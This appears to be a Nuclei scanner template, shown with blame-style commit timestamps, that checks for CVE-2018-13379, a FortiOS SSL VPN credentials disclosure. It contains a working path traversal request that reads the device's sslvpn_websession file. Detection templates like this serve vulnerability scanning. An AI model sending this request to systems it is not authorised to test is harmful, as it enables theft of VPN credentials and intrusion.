2021-01-02 05:00:39 +00:00
|
|
|
id: CVE-2018-13379
|
2020-04-22 06:42:01 +00:00
|
|
|
|
|
|
|
info:
|
2020-06-22 13:35:37 +00:00
|
|
|
name: FortiOS - Credentials Disclosure
|
2020-04-22 06:42:01 +00:00
|
|
|
author: organiccrap
|
|
|
|
severity: high
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2018,fortios
|
2020-04-22 06:42:01 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
2020-05-25 07:49:06 +00:00
|
|
|
path:
|
2021-04-20 23:15:12 +00:00
|
|
|
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
2020-04-22 06:42:01 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
2020-05-25 07:49:06 +00:00
|
|
|
words:
|
2021-02-23 20:47:27 +00:00
|
|
|
- "var fgt_lang"
|